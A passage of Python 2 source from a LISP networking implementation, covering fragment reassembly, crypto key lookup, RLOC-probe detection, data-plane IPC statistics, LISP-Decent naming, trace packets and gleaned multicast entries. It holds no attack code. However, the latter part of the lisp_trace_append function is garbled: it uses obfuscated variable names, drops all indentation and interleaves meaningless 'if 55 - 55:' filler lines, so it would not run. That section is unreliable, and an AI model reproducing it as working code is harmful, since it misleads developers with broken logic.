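# "[<key-id>]<password>[<key-id>]<password>..." into a dictionary indexed
# by key-id. A value with no "[" brackets is stored under key-id 0. Returns
# None when a key-id is not an integer.
#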
def lisp_parse_auth_key(value):
    tokens = value.split("[")
    auth_key = {}
    if (len(tokens) == 1):
        auth_key[0] = value
        return (auth_key)

    for token in tokens:
        if (token == ""): continue
        index = token.find("]")
        key_id = token[0:index]
        try: key_id = int(key_id)
        except: return

        auth_key[key_id] = token[index + 1::]
    return (auth_key)
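
#
# lisp_reassemble
#
# Reassemble IPv4 fragments of a LISP encapsulated packet. Returns the
# packet when it is not a fragment or when the final fragment has arrived,
# and None while fragments are still outstanding. The first fragment is
# checked for a LISP/VXLAN data port so fragments of non-LISP flows are
# dropped.
#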
def lisp_reassemble(packet):
    fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])

    # Not a fragment, return packet.
    if (fo == 0 or fo == 0x4000): return (packet)

    ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
    flength = socket.ntohs(struct.unpack("H", packet[2:4])[0])

    last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
    entry = [(fo & 0x1fff) * 8, flength - 20, packet, last_frag]

    # For the first fragment, verify the UDP ports are LISP data ports.
    # Otherwise, queue a None packet so later fragments are dropped too.
    if (fo == 0x2000):
        sport, dport = struct.unpack("HH", packet[20:24])
        sport = socket.ntohs(sport)
        dport = socket.ntohs(dport)
        if (dport not in [4341, 8472, 4789] and sport != 4341):
            lisp_reassembly_queue[ident] = []
            entry[2] = None

    if (lisp_reassembly_queue.has_key(ident) == False):
        lisp_reassembly_queue[ident] = []

    queue = lisp_reassembly_queue[ident]

    if (len(queue) == 1 and queue[0][2] == None):
        dprint("Drop non-LISP encapsulated fragment 0x{}".format(
            lisp_hex_string(ident).zfill(4)))
        return (None)

    queue.append(entry)
    queue = sorted(queue)

    addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    source = addr.print_address_no_iid()
    addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
    dest = addr.print_address_no_iid()
    addr = red("{} -> {}".format(source, dest), False)

    dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format(
        bold("Received", False),
        " non-LISP encapsulated" if entry[2] == None else "", addr,
        lisp_hex_string(ident).zfill(4), lisp_hex_string(fo).zfill(4)))

    # Check if all fragments have arrived: offsets must be contiguous and
    # the last fragment must be present.
    if (queue[0][0] != 0 or queue[-1][3] == False): return (None)
    last_entry = queue[0]
    for frag in queue[1::]:
        fo = frag[0]
        last_offset, last_length = last_entry[0], last_entry[1]
        if (last_offset + last_length != fo): return (None)
        last_entry = frag

    lisp_reassembly_queue.pop(ident)

    packet = queue[0][2]
    for frag in queue[1::]: packet += frag[2][20::]

    dprint("{} fragments arrived for packet 0x{}, length {}".format(
        bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))

    # Rebuild the IP header: store new total length, zero the fragment
    # field and checksum, then recompute the checksum.
    length = socket.htons(len(packet))
    header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
        struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
        packet[12:20]

    header = lisp_ip_checksum(header)
    return (header + packet[20::])
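
#
# lisp_get_crypto_decap_lookup_key
#
# Return the key ("<addr>:<port>" or "<addr>") under which decap crypto
# state is stored for this RLOC, copying an existing "<addr>:<port>" entry
# into the addr-only slot when needed. Returns None when no entry exists.
#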
def lisp_get_crypto_decap_lookup_key(addr, port):
    addr_str = addr.print_address_no_iid() + ":" + str(port)
    if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return (addr_str)

    addr_str = addr.print_address_no_iid()
    if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return (addr_str)

    for key in lisp_crypto_keys_by_rloc_decap:
        a = key.split(":")
        if (len(a) == 1): continue
        a = a[0] if len(a) == 2 else ":".join(a[0:-1])
        if (a == addr_str):
            keys = lisp_crypto_keys_by_rloc_decap[key]
            lisp_crypto_keys_by_rloc_decap[addr_str] = keys
            return (addr_str)

    return (None)
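
#
# lisp_build_crypto_decap_lookup_key
#
# Decide whether decap crypto state for this RLOC should be indexed by
# "<addr>" or "<addr>:<port>". On an RTR, a NAT-traversed xTR is indexed
# with the port included.
#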
def lisp_build_crypto_decap_lookup_key(addr, port):
    addr = addr.print_address_no_iid()
    addr_and_port = addr + ":" + str(port)

    if (lisp_i_am_rtr):
        if (lisp_rloc_probe_list.has_key(addr)): return (addr)

        for nat_info in lisp_nat_state_info.values():
            for info in nat_info:
                if (addr == info.address): return (addr_and_port)
        return (addr)
    return (addr_and_port)
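
#
# lisp_set_ttl
#
# Set the IP TTL (unicast and multicast) for packets sent on the supplied
# socket.
#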
def lisp_set_ttl(lisp_socket, ttl):
    try:
        lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
        lisp_socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, ttl)
    except:
        lprint("socket.setsockopt(IP_TTL) not supported")
    return
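
#
# lisp_is_rloc_probe_request
#
# Return True if the first byte of a LISP control message is a Map-Request
# (type 1) with the RLOC-probe bit set (0x12).
#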
def lisp_is_rloc_probe_request(lisp_type):
    lisp_type = struct.unpack("B", lisp_type)[0]
    return (lisp_type == 0x12)
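
#
# lisp_is_rloc_probe_reply
#
# Return True if the first byte of a LISP control message is a Map-Reply
# (type 2) with the RLOC-probe bit set (0x28).
#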
def lisp_is_rloc_probe_reply(lisp_type):
    lisp_type = struct.unpack("B", lisp_type)[0]
    return (lisp_type == 0x28)
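
#
# lisp_is_rloc_probe
#
# Decide if a pcap-received IPv4 packet is an RLOC-probe sent to or from the
# LISP control port. rr selects what to match: 0 = probe requests, 1 = probe
# replies, -1 = either. Returns [packet, source, port, ttl] with the IP/UDP
# headers stripped, [packet, None, None, None] when the packet is not a
# probe, or [None, None, None, None] for probes we sent ourselves.
#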
def lisp_is_rloc_probe(packet, rr):
    udp = (struct.unpack("B", packet[9])[0] == 17)
    if (udp == False): return ([packet, None, None, None])

    sport = struct.unpack("H", packet[20:22])[0]
    dport = struct.unpack("H", packet[22:24])[0]
    is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
    if (is_lisp == False): return ([packet, None, None, None])

    if (rr == 0):
        probe = lisp_is_rloc_probe_request(packet[28])
        if (probe == False): return ([packet, None, None, None])
    elif (rr == 1):
        probe = lisp_is_rloc_probe_reply(packet[28])
        if (probe == False): return ([packet, None, None, None])
    elif (rr == -1):
        probe = lisp_is_rloc_probe_request(packet[28])
        if (probe == False):
            probe = lisp_is_rloc_probe_reply(packet[28])
            if (probe == False): return ([packet, None, None, None])

    source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])

    # Ignore probes we sent ourselves (the source is a local address).
    if (source.is_local()): return ([None, None, None, None])

    source = source.print_address_no_iid()
    port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
    ttl = struct.unpack("B", packet[8])[0] - 1
    packet = packet[28::]

    recv = bold("Receive(pcap)", False)
    from_str = bold("from " + source, False)
    packet_str = lisp_format_packet(packet)
    lprint("{} {} bytes {} {}, packet: {}".format(recv, len(packet),
        from_str, port, packet_str))

    return ([packet, source, port, ttl])
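
#
# lisp_ipc_write_xtr_parameters
#
# Send an "xtr-parameters" record (logging flags and whether we are an RTR)
# to the data-plane socket.
#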
def lisp_ipc_write_xtr_parameters(cp, dp):
    if (lisp_ipc_dp_socket == None): return

    entry = {"type": "xtr-parameters", "control-plane-logging": cp,
        "data-plane-logging": dp, "rtr": lisp_i_am_rtr}

    lisp_write_to_dp_socket(entry)
    return
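
#
# lisp_external_data_plane
#
# Return True when an external data-plane is in use, that is, when
# "ipc-data-plane = yes" appears in ./lisp.config or the LISP_RUN_LISP_XTR
# environment variable is set.
#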
def lisp_external_data_plane():
    grep = 'egrep "ipc-data-plane = yes" ./lisp.config'
    if (commands.getoutput(grep) != ""): return (True)

    if (os.getenv("LISP_RUN_LISP_XTR") != None): return (True)
    return (False)
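
#
# lisp_process_data_plane_restart
#
# The external data-plane restarted: touch ./lisp.config so configuration
# is re-read, and resend the entire map-cache (or an empty one when
# do_clear is True) over the IPC socket.
#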
def lisp_process_data_plane_restart(do_clear=False):
    os.system("touch ./lisp.config")

    entry = {"type": "entire-map-cache", "entries": []}

    if (do_clear == False):
        entries = entry["entries"]
        lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)

    lisp_write_to_dp_socket(entry)
    return
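
#
# lisp_process_data_plane_stats
#
# Process a "statistics" IPC message from the data-plane: add the per-RLOC
# packet/byte counts into the matching map-cache entries, and refresh any
# unicast entry whose TTL has elapsed.
#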
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
    if (msg.has_key("entries") == False):
        lprint("No 'entries' in stats IPC message")
        return
    if (type(msg["entries"]) != list):
        lprint("'entries' in stats IPC message must be an array")
        return

    for msg in msg["entries"]:
        if (msg.has_key("eid-prefix") == False):
            lprint("No 'eid-prefix' in stats IPC message")
            continue
        eid_str = msg["eid-prefix"]

        if (msg.has_key("instance-id") == False):
            lprint("No 'instance-id' in stats IPC message")
            continue
        iid = int(msg["instance-id"])

        # Look up EID-prefix in map-cache.
        eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
        eid.store_prefix(eid_str)
        mc = lisp_map_cache_lookup(None, eid)
        if (mc == None):
            lprint("Map-cache entry for {} not found for stats update".format(
                eid_str))
            continue

        if (msg.has_key("rlocs") == False):
            lprint("No 'rlocs' in stats IPC message for {}".format(eid_str))
            continue
        if (type(msg["rlocs"]) != list):
            lprint("'rlocs' in stats IPC message must be an array")
            continue
        rlocs = msg["rlocs"]

        # Update stats for each RLOC of the map-cache entry.
        for rloc in rlocs:
            if (rloc.has_key("rloc") == False): continue

            rloc_str = rloc["rloc"]
            if (rloc_str == "no-address"): continue

            rloc_addr = lisp_address(LISP_AFI_NONE, "", 0, 0)
            rloc_addr.store_address(rloc_str)

            rloc_entry = mc.get_rloc(rloc_addr)
            if (rloc_entry == None): continue

            pc = 0 if rloc.has_key("packet-count") == False else \
                rloc["packet-count"]
            bc = 0 if rloc.has_key("byte-count") == False else \
                rloc["byte-count"]
            ts = 0 if rloc.has_key("seconds-last-packet") == False else \
                rloc["seconds-last-packet"]

            rloc_entry.stats.packet_count += pc
            rloc_entry.stats.byte_count += bc
            rloc_entry.stats.last_increment = lisp_get_timestamp() - ts

            lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
                ts, eid_str, rloc_str))

        # Refresh the entry if its TTL has elapsed and it is being used.
        if (mc.group.is_null() and mc.has_ttl_elapsed()):
            eid_str = green(mc.print_eid_tuple(), False)
            lprint("Refresh map-cache entry {}".format(eid_str))
            lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
    return
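
#
# lisp_process_data_plane_decap_stats
#
# Process a "decap-statistics" IPC message. An ITR forwards the message to
# the lisp-etr process; an ETR/RTR adds the counts into lisp_decap_stats.
#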
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):

    # An ITR just forwards the message to the lisp-etr process.
    if (lisp_i_am_itr):
        lprint("Send decap-stats IPC message to lisp-etr process")
        ipc = "stats%{}".format(json.dumps(msg))
        ipc = lisp_command_ipc(ipc, "lisp-itr")
        lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
        return

    ipc = bold("IPC", False)
    lprint("Process decap-stats {} message: '{}'".format(ipc, msg))

    # When the ETR gets the message via command IPC it is still a string.
    if (lisp_i_am_etr): msg = json.loads(msg)

    key_names = ["good-packets", "ICV-error", "checksum-error",
        "lisp-header-error", "no-decrypt-key", "bad-inner-version",
        "outer-header-error"]

    for key_name in key_names:
        pc = 0 if msg.has_key(key_name) == False else \
            msg[key_name]["packet-count"]
        lisp_decap_stats[key_name].packet_count += pc

        bc = 0 if msg.has_key(key_name) == False else \
            msg[key_name]["byte-count"]
        lisp_decap_stats[key_name].byte_count += bc

        ts = 0 if msg.has_key(key_name) == False else \
            msg[key_name]["seconds-last-packet"]
        lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
    return
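
#
# lisp_process_punt
#
# Process a JSON message punted from the data-plane: "statistics",
# "decap-statistics", "restart", or "discovery". For discovery, learn a
# dynamic source-EID and/or send a Map-Request for an unknown destination
# EID.
#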
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
    data, source = punt_socket.recvfrom(4000)

    msg = json.loads(data)
    if (type(msg) != dict):
        lprint("Invalid punt message from {}, not in JSON format".format(
            source))
        return

    punt = bold("Punt", False)
    lprint("{} message from '{}': '{}'".format(punt, source, msg))

    if (msg.has_key("type") == False):
        lprint("Punt IPC message has no 'type' key")
        return

    # Process statistics and restart messages.
    if (msg["type"] == "statistics"):
        lisp_process_data_plane_stats(msg, lisp_send_sockets,
            lisp_ephem_port)
        return
    if (msg["type"] == "decap-statistics"):
        lisp_process_data_plane_decap_stats(msg, punt_socket)
        return
    if (msg["type"] == "restart"):
        lisp_process_data_plane_restart()
        return

    if (msg["type"] != "discovery"):
        lprint("Punt IPC message has wrong format")
        return
    if (msg.has_key("interface") == False):
        lprint("Invalid punt message from {}, required keys missing".format(
            source))
        return

    # Get instance-ID from the interface, or directly from the message.
    device = msg["interface"]
    if (device == ""):
        iid = int(msg["instance-id"])
        if (iid == -1): return
    else:
        iid = lisp_get_interface_instance_id(device, None)

    # Validate source-EID and dest-EID addresses when present.
    seid = None
    if (msg.has_key("source-eid")):
        source_eid = msg["source-eid"]
        seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
        if (seid.is_null()):
            lprint("Invalid source-EID format '{}'".format(source_eid))
            return

    deid = None
    if (msg.has_key("dest-eid")):
        dest_eid = msg["dest-eid"]
        deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
        if (deid.is_null()):
            lprint("Invalid dest-EID format '{}'".format(dest_eid))
            return

    # Do source-EID discovery when the EID is covered by a dynamic-EID
    # database-mapping entry.
    if (seid):
        eid_str = green(seid.print_address(), False)
        db = lisp_db_for_lookups.lookup_cache(seid, False)
        if (db != None):
            if (db.dynamic_eid_configured()):
                interface = lisp_allow_dynamic_eid(device, seid)
                if (interface != None and lisp_i_am_itr):
                    lisp_itr_discover_eid(db, seid, device, interface,
                        punt_socket)
                else:
                    lprint(("Disallow dynamic source-EID {} " +
                        "on interface {}").format(eid_str, device))
        else:
            lprint("Punt from non-EID source {}".format(eid_str))

    # Send a Map-Request when there is no map-cache entry for the
    # destination EID.
    if (deid):
        mc = lisp_map_cache_lookup(seid, deid)
        if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
            if (lisp_rate_limit_map_request(deid)): return
            lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
                seid, deid, None)
        else:
            eid_str = green(deid.print_address(), False)
            lprint("Map-cache entry for {} already exists".format(eid_str))
    return
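
#
# lisp_ipc_map_cache_entry
#
# Callback used by walk routines to append one map-cache entry, in IPC JSON
# form, to the supplied array.
#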
def lisp_ipc_map_cache_entry(mc, jdata):
    entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
    jdata.append(entry)
    return ([True, jdata])
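
#
# lisp_ipc_walk_map_cache
#
# Walk a map-cache entry, descending into (S,G) source state when present,
# appending IPC JSON records to jdata.
#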
def lisp_ipc_walk_map_cache(mc, jdata):

    # There is only destination state in this map-cache entry.
    if (mc.group.is_null()): return (lisp_ipc_map_cache_entry(mc, jdata))

    if (mc.source_cache == None): return ([True, jdata])

    # There is (source, group) state, so walk all sources for this group
    # entry.
    jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
    return ([True, jdata])
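
#
# lisp_itr_discover_eid
#
# Record a newly discovered dynamic-EID in the database-mapping entry (or
# just refresh its last-packet timestamp) and tell the lisp-etr process via
# IPC so it can register the EID.
#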
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
    lisp_ipc_listen_socket):
    eid_str = eid.print_address()
    if (db.dynamic_eids.has_key(eid_str)):
        db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
        return

    # Add dynamic-EID state.
    dyn_eid = lisp_dynamic_eid()
    dyn_eid.dynamic_eid.copy_address(eid)
    dyn_eid.interface = routed_interface
    dyn_eid.last_packet = lisp_get_timestamp()
    dyn_eid.get_timeout(routed_interface)
    db.dynamic_eids[eid_str] = dyn_eid

    routed = ""
    if (input_interface != routed_interface):
        routed = ", routed-interface " + routed_interface

    eid_string = green(eid_str, False) + bold(" discovered", False)
    lprint("Dynamic-EID {} on interface {}{}, timeout {}".format(eid_string,
        input_interface, routed, dyn_eid.timeout))

    # Tell the lisp-etr process so it can register the dynamic-EID.
    ipc = "learn%{}%{}".format(eid_str, routed_interface)
    ipc = lisp_command_ipc(ipc, "lisp-itr")
    lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
    return
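
#
# lisp_retry_decap_keys
#
# When an ICV check fails, try the crypto keys stored under other
# "<addr>:<port>" entries for the same source RLOC and switch to the entry
# whose ICV matches. IPv6 RLOCs are not searched.
#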
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
    if (lisp_search_decap_keys == False): return

    # Don't do this for IPv6 RLOCs.
    if (addr_str.find(":") != -1): return

    current_keys = lisp_crypto_keys_by_rloc_decap[addr_str]

    for addr in lisp_crypto_keys_by_rloc_decap:

        # Only consider other entries for the same address.
        if (addr.find(addr_str) == -1): continue
        if (addr == addr_str): continue

        entry = lisp_crypto_keys_by_rloc_decap[addr]
        if (entry == current_keys): continue

        # Try ICV check with this key entry.
        key = entry[1]
        if (packet_icv != key.do_icv(packet, iv)):
            lprint("Test ICV with key {} failed".format(red(addr, False)))
            continue

        lprint("Changing decap crypto key to {}".format(red(addr, False)))
        lisp_crypto_keys_by_rloc_decap[addr_str] = entry
    return
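
#
# lisp_decent_pull_xtr_configured
#
# Return True when the LISP-Decent pull-based mapping system is configured
# (a modulus and a DNS suffix are both set).
#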
def lisp_decent_pull_xtr_configured():
    return (lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
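
#
# lisp_is_decent_dns_suffix
#
# Return True if the supplied DNS name, minus its first label, matches the
# configured LISP-Decent DNS suffix.
#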
def lisp_is_decent_dns_suffix(dns_name):
    if (lisp_decent_dns_suffix == None): return (False)
    name = dns_name.split(".")
    name = ".".join(name[1::])
    return (name == lisp_decent_dns_suffix)
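
#
# lisp_get_decent_index
#
# Hash the EID-prefix with SHA-256 and return the hash modulo the
# LISP-Decent modulus, which is used to select the map-server for the
# prefix.
#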
def lisp_get_decent_index(eid):
    eid_str = eid.print_prefix()
    hash_value = hashlib.sha256(eid_str).hexdigest()
    index = int(hash_value, 16) % lisp_decent_modulus
    return (index)
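
#
# lisp_get_decent_dns_name
#
# Return the LISP-Decent map-server DNS name "<index>.<dns-suffix>" for an
# EID.
#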
def lisp_get_decent_dns_name(eid):
    index = lisp_get_decent_index(eid)
    return (str(index) + "." + lisp_decent_dns_suffix)
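
#
# lisp_get_decent_dns_name_from_str
#
# Same as lisp_get_decent_dns_name() but takes the EID as an instance-ID
# and address string.
#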
def lisp_get_decent_dns_name_from_str(iid, eid_str):
    eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
    index = lisp_get_decent_index(eid)
    return (str(index) + "." + lisp_decent_dns_suffix)
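
#
# lisp_trace_append
#
# Append this node's entry (node type, source/dest RLOC, hostname,
# encap/decap timestamp, optional RTT/hop/latency data) to the JSON payload
# of a LISP-Trace packet and rebuild the inner UDP/IP headers. When the
# destination RLOC is unknown, the trace is returned to the original
# sender. Returns False when the packet should not be forwarded further.
#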
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
    rloc_entry=None):

    oO0ooOoO = 28 if packet.inner_version == 4 else 48
    oOO00 = packet.packet[oO0ooOoO::]
    O0oOo0O0O = lisp_trace()
    if (O0oOo0O0O.decode(oOO00) == False):
        lprint("Could not decode JSON portion of a LISP-Trace packet")
        return (False)

    iiI11IiI1 = "?" if packet.outer_dest.is_null() else \
        packet.outer_dest.print_address_no_iid()

    if (iiI11IiI1 != "?" and packet.encap_port != LISP_DATA_PORT):
        if (ed == "encap"): iiI11IiI1 += ":{}".format(packet.encap_port)

    i1ii1i1Ii11 = {}
    i1ii1i1Ii11["node"] = "ITR" if lisp_i_am_itr else "ETR" if \
        lisp_i_am_etr else "RTR" if lisp_i_am_rtr else "?"

    iIIiI1I = packet.outer_source
    if (iIIiI1I.is_null()): iIIiI1I = lisp_myrlocs[0]
    i1ii1i1Ii11["srloc"] = iIIiI1I.print_address_no_iid()

    if (i1ii1i1Ii11["node"] == "ITR" and
        packet.inner_sport != LISP_TRACE_PORT):
        i1ii1i1Ii11["srloc"] += ":{}".format(packet.inner_sport)

    i1ii1i1Ii11["hn"] = lisp_hostname
    o0Oo = ed + "-ts"
    i1ii1i1Ii11[o0Oo] = lisp_get_timestamp()

    if (iiI11IiI1 == "?" and i1ii1i1Ii11["node"] == "ETR"):
        Oooo00oo = lisp_db_for_lookups.lookup_cache(packet.inner_dest,
            False)
        if (Oooo00oo != None and len(Oooo00oo.rloc_set) >= 1):
            iiI11IiI1 = Oooo00oo.rloc_set[0].rloc.print_address_no_iid()

    i1ii1i1Ii11["drloc"] = iiI11IiI1

    if (iiI11IiI1 == "?" and reason != None):
        i1ii1i1Ii11["drloc"] += " ({})".format(reason)

    if (rloc_entry != None):
        i1ii1i1Ii11["rtts"] = rloc_entry.recent_rloc_probe_rtts
        i1ii1i1Ii11["hops"] = rloc_entry.recent_rloc_probe_hops
        i1ii1i1Ii11["latencies"] = rloc_entry.recent_rloc_probe_latencies

    i1I1I = packet.inner_source.print_address()
    OO0ooOo0ooooo = packet.inner_dest.print_address()
    if (O0oOo0O0O.packet_json == []):
        i1II111ii1i = {}
        i1II111ii1i["seid"] = i1I1I
        i1II111ii1i["deid"] = OO0ooOo0ooooo
        i1II111ii1i["paths"] = []
        O0oOo0O0O.packet_json.append(i1II111ii1i)

    for i1II111ii1i in O0oOo0O0O.packet_json:
        if (i1II111ii1i["deid"] != OO0ooOo0ooooo): continue
        i1II111ii1i["paths"].append(i1ii1i1Ii11)
        break

    ooiIII = False
    if (len(O0oOo0O0O.packet_json) == 1 and i1ii1i1Ii11["node"] == "ETR" and
        O0oOo0O0O.myeid(packet.inner_dest)):
        i1II111ii1i = {}
        i1II111ii1i["seid"] = OO0ooOo0ooooo
        i1II111ii1i["deid"] = i1I1I
        i1II111ii1i["paths"] = []
        O0oOo0O0O.packet_json.append(i1II111ii1i)
        ooiIII = True

    O0oOo0O0O.print_trace()
    oOO00 = O0oOo0O0O.encode()

    Ooo00oOo0O0 = O0oOo0O0O.packet_json[0]["paths"][0]["srloc"]
    if (iiI11IiI1 == "?"):
        lprint("LISP-Trace return to sender RLOC {}".format(Ooo00oOo0O0))
        O0oOo0O0O.return_to_sender(lisp_socket, Ooo00oOo0O0, oOO00)
        return (False)

    iIIIIi = O0oOo0O0O.packet_length()

    I1i1 = packet.packet[0:oO0ooOoO]
    IiI1i1i1 = struct.pack("HH", socket.htons(iIIIIi), 0)
    I1i1 = I1i1[0:oO0ooOoO - 4] + IiI1i1i1
    if (packet.inner_version == 6 and i1ii1i1Ii11["node"] == "ETR" and
        len(O0oOo0O0O.packet_json) == 2):
        oOoO0OOO00O = I1i1[oO0ooOoO - 8::] + oOO00
        oOoO0OOO00O = lisp_udp_checksum(i1I1I, OO0ooOo0ooooo, oOoO0OOO00O)
        I1i1 = I1i1[0:oO0ooOoO - 8] + oOoO0OOO00O[0:8]

    if (ooiIII):
        if (packet.inner_version == 4):
            I1i1 = I1i1[0:12] + I1i1[16:20] + I1i1[12:16] + I1i1[22:24] + \
                I1i1[20:22] + I1i1[24::]
        else:
            I1i1 = I1i1[0:8] + I1i1[24:40] + I1i1[8:24] + I1i1[42:44] + \
                I1i1[40:42] + I1i1[44::]

        o0 = packet.inner_dest
        packet.inner_dest = packet.inner_source
        packet.inner_source = o0

    oO0ooOoO = 2 if packet.inner_version == 4 else 4
    oOooOOoOo00 = 20 + iIIIIi if packet.inner_version == 4 else iIIIIi
    I1Iii = struct.pack("H", socket.htons(oOooOOoOo00))
    I1i1 = I1i1[0:oO0ooOoO] + I1Iii + I1i1[oO0ooOoO + 2::]
if 55 - 55: OoooooooOO + i11iIiiIii % I11i - OOooOOo
if 49 - 49: O0 + I1IiiI . II111iiii
if 14 - 14: iIii1I11I1II1 * I11i + OoO0O00 - oO0o
if ( packet . inner_version == 4 ) :
IiiI11iIi = struct . pack ( "H" , 0 )
I1i1 = I1i1 [ 0 : 10 ] + IiiI11iIi + I1i1 [ 12 : : ]
I1Iii = lisp_ip_checksum ( I1i1 [ 0 : 20 ] )
I1i1 = I1Iii + I1i1 [ 20 : : ]
if 15 - 15: O0 + IiII
if 49 - 49: i1IIi - i11iIiiIii + II111iiii + Ii1I / OoO0O00
if 34 - 34: I1ii11iIi11i * i11iIiiIii
if 6 - 6: I1ii11iIi11i + I1IiiI / OoooooooOO % I11i * Oo0Ooo
if 20 - 20: Oo0Ooo
packet . packet = I1i1 + oOO00
return ( True )
def lisp_allow_gleaning(eid, group, rloc):
    #
    # Walk the configured glean-mapping entries and return a 3-tuple:
    # (gleaning-allowed?, rloc-probe?, igmp-query?). Local names have been
    # deobfuscated; behavior is unchanged.
    #
    if (lisp_glean_mappings == []): return (False, False, False)

    for entry in lisp_glean_mappings:
        if (entry.has_key("instance-id")):
            iid = eid.instance_id
            low, high = entry["instance-id"]
            if (iid < low or iid > high): continue

        if (entry.has_key("eid-prefix")):
            eid_prefix = copy.deepcopy(entry["eid-prefix"])
            eid_prefix.instance_id = eid.instance_id
            if (eid.is_more_specific(eid_prefix) == False): continue

        if (entry.has_key("group-prefix")):
            if (group == None): continue
            group_prefix = copy.deepcopy(entry["group-prefix"])
            group_prefix.instance_id = group.instance_id
            if (group.is_more_specific(group_prefix) == False): continue

        if (entry.has_key("rloc-prefix")):
            if (rloc != None and
                rloc.is_more_specific(entry["rloc-prefix"]) == False): continue

        return (True, entry["rloc-probe"], entry["igmp-query"])

    return (False, False, False)
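
#
# For illustration only: lisp_allow_gleaning() expects each element of
# lisp_glean_mappings to look roughly like the hypothetical dict below.
# Only the keys the function actually reads are shown; all of them are
# optional except "rloc-probe" and "igmp-query":
#
#   {"instance-id": (0, 0xffffff),      # allowed IID range (low, high)
#    "eid-prefix": <lisp_address>,      # optional EID filter
#    "group-prefix": <lisp_address>,    # optional multicast-group filter
#    "rloc-prefix": <lisp_address>,     # optional RLOC filter
#    "rloc-probe": True,
#    "igmp-query": False}
#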
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
    group_str = geid.print_address()
    seid_name = seid.print_address_no_iid()
    seid_str = green("{}".format(seid_name), False)
    eid_str = green("(*, {})".format(group_str), False)
    rloc_str = red(rloc.print_address_no_iid() + ":" + str(port), False)

    #
    # Look up (*, G) in the map-cache; create a gleaned entry if not found.
    #
    mc = lisp_map_cache_lookup(seid, geid)
    if (mc == None):
        mc = lisp_mapping("", "", [])
        mc.group.copy_address(geid)
        mc.eid.copy_address(geid)
        mc.eid.address = 0
        mc.eid.mask_len = 0
        mc.mapping_source.copy_address(rloc)
        mc.map_cache_ttl = LISP_IGMP_TTL
        mc.gleaned = True
        mc.add_cache()
        lprint("Add gleaned EID {} to map-cache".format(eid_str))

    #
    # Find an existing RLE node for this source EID, if the entry already
    # has an RLOC with an RLE attached.
    #
    rloc_entry = rle = rle_node = None
    if (mc.rloc_set != []):
        rloc_entry = mc.rloc_set[0]
        if (rloc_entry.rle):
            rle = rloc_entry.rle
            for node in rle.rle_nodes:
                if (node.rloc_name != seid_name): continue
                rle_node = node
                break

    #
    # Create RLOC, RLE, and RLE-node structures as needed.
    #
    if (rloc_entry == None):
        rloc_entry = lisp_rloc()
        mc.rloc_set = [rloc_entry]
        rloc_entry.priority = 253
        rloc_entry.mpriority = 255
        mc.build_best_rloc_set()

    if (rle == None):
        rle = lisp_rle(geid.print_address())
        rloc_entry.rle = rle

    if (rle_node == None):
        rle_node = lisp_rle_node()
        rle_node.rloc_name = seid_name
        rle.rle_nodes.append(rle_node)
        rle.build_forwarding_list()
        lprint("Add RLE {} from {} for gleaned EID {}".format(rloc_str,
            seid_str, eid_str))
    elif (rloc.is_exact_match(rle_node.address) == False or
          port != rle_node.translated_port):
        lprint("Changed RLE {} from {} for gleaned EID {}".format(rloc_str,
            seid_str, eid_str))

    #
    # Store the (possibly NAT-translated) RLOC and port in the RLE node.
    #
    rle_node.store_translated_rloc(rloc, port)

    #
    # Remember the group join time when triggered by an IGMP report.
    #
    if (igmp):
        seid_str_iid = seid.print_address()
        if (lisp_gleaned_groups.has_key(seid_str_iid) == False):
            lisp_gleaned_groups[seid_str_iid] = {}
        lisp_gleaned_groups[seid_str_iid][group_str] = lisp_get_timestamp()
def lisp_remove_gleaned_multicast(seid, geid):
    #
    # Find the gleaned (*, G) map-cache entry and its RLE.
    #
    mc = lisp_map_cache_lookup(seid, geid)
    if (mc == None): return

    rle = mc.rloc_set[0].rle
    if (rle == None): return

    seid_name = seid.print_address_no_iid()
    found = False
    for rle_node in rle.rle_nodes:
        if (rle_node.rloc_name == seid_name):
            found = True
            break

    if (found == False): return

    #
    # Remove the RLE node for this source EID and rebuild the forwarding list.
    #
    rle.rle_nodes.remove(rle_node)
    rle.build_forwarding_list()

    group_str = geid.print_address()
    seid_str = seid.print_address()
    s = green("{}".format(seid_str), False)
    g = green("(*, {})".format(group_str), False)
    lprint("Gleaned EID {} RLE removed for {}".format(g, s))

    #
    # Forget that this EID joined the group.
    #
    if (lisp_gleaned_groups.has_key(seid_str)):
        if (lisp_gleaned_groups[seid_str].has_key(group_str)):
